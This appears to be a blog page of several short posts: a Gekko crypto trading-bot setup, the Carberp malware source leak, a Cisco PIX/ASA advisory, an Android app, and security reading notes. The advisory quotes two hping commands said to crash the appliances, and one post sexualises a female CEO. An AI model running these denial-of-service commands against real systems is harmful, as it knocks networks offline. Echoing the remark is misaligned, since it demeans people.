In this article we will cover how to quickly setup a trading bot for crypto-currencies. As the difficulty for BTC continues to rise the profit in mining coins continues to drop. A good method to make up those losses is with a trading bot which will work to increase your profit margin by making the moves needed on the market while you are away.
For this we will use the following tools:
Turnkey Linux NODE.js VM
Gekko Trading Bot
Mt.Gox or BTCe account (w/ funds)
Setting up the Environment
First we will download the following Linux VM image
Change the “exchange” to your preferred trading hub
Change the currency setting to match your desired currency
If you want to enable trading then add the API key/secret generated by your trading hub for your account
Also change the tradingEnabled to true to allow trading.
config.normal = {
enabled: true,
exchange: 'MtGox', // 'MtGox', 'BTCe', 'Bitstamp' or 'cexio'
currency: 'USD',
asset: 'BTC',
tradingEnabled: false,
key: '',
secret: '',
username: 0 // only fill this is when using Bitstamp or cexio
}
Also ensure the “Advanced section” matches the settings in the config.normal section if you enable trading. This would include the Trading Hub set to “true” along with the same API key/secret used.
Now we can launch the bot and monitor its performance and trading from the console
byobu && node gekko
2013-12-10 18:12:11 (INFO): Profit reporter active on simulated balance 2013-12-10 18:12:11 (INFO): Calculating EMA on historical data… 2013-12-10 18:14:31 (INFO): ADVICE is to BUY @ xxx.xxx (x.xxx)
The point is ladies and gentlemen that greed, for lack of a better word, is good.
And that’s it! Take a snapshot of the VM instance and clone away if you need to trade on more than one hub at a time.
Very interesting source code leak today for the Carberp malware family.
This black market malware once being offered for $40k will surely be of interest to anyone who conducts malware & botnet analysis. The leak included a few other tools that helped make it so successful like the bootloader, MC obfuscate, along with various functions taken from other malware source code like Zeus and Spyeye.
Which begs the question, how do we address the leakage and sharing of malware source code in the public domain?
Stoned framework with Black Hat Europe 2007 Vipin Kumar POC, detected as Sinowal
pro\source builder plugins inj’s modules etc\Сорцы и Модули\Stoned Bootkit Framework.zip
There is also a copy of Win32 Obfuscator known as Mystic Compressor.
adminpanel без иконки\bot_adm\cache\cryptor\CRYPTOR.EXE
pro\all source\BootkitDropper\nbuild\Tools\Mystic.exe
pro\all source\Locker\build\Tools\mystic.exe
pro\all source\test\Mystic.exe
pro\all source\Инфа по буткиту\Инсталятор БК\BootkitDropperPlugBuild\Tools\Mystic.exe
Some fairly critical issues disclosed on a very popular security product.
Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.
Read More Here … An attacker can use readily available network utilities to exploit these issues.
The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:
/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2
/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2
Really this needs no introduction more than this video can provide!
One of the first products of the Android Bounty program hosted by Androidandme this not only blows the iPhone’s torrent (download to local storage) program out of the water but just shows the power of open source!
And to think the bounty the developer earned for this was about $90.. So when you see the 2.99 price tag for the app on the market keep this in mind
It is common to read about various social engineering attack scenario’s in many of today’s IT security based books. None the less just like the need to constantly drill this information into the minds of the non tech users of many organizations. It makes for a better story when the scenario can be drawn from real world experiences. SearchSecurity had an excerpt from the book titled “The Truth About Identity Theft” that cover the topic in this exact way. But of course this would never happen in your organization now would it? (as they say ignorance is bliss)
Since I did not get out to Black Hat DC last month I was just reviewing the papers and came across one very interesting one. Aside from the white paper I also enjoy the story about the new “Friends” disclosing such an exploit brings. All in all a good read and just more wood for the fires of security threats in our digital age.. I should point out that the founder and CEO of the company to disclose this is pretty hot, and the fact that she is smarts.. and can hack increase the hot meter by at least x10.
Rather than base the encryption on complex maths, such systems use the laws of quantum theory – in particular, the Heisenberg Uncertainty Principle, which says quantum information cannot be measured without disturbing it.
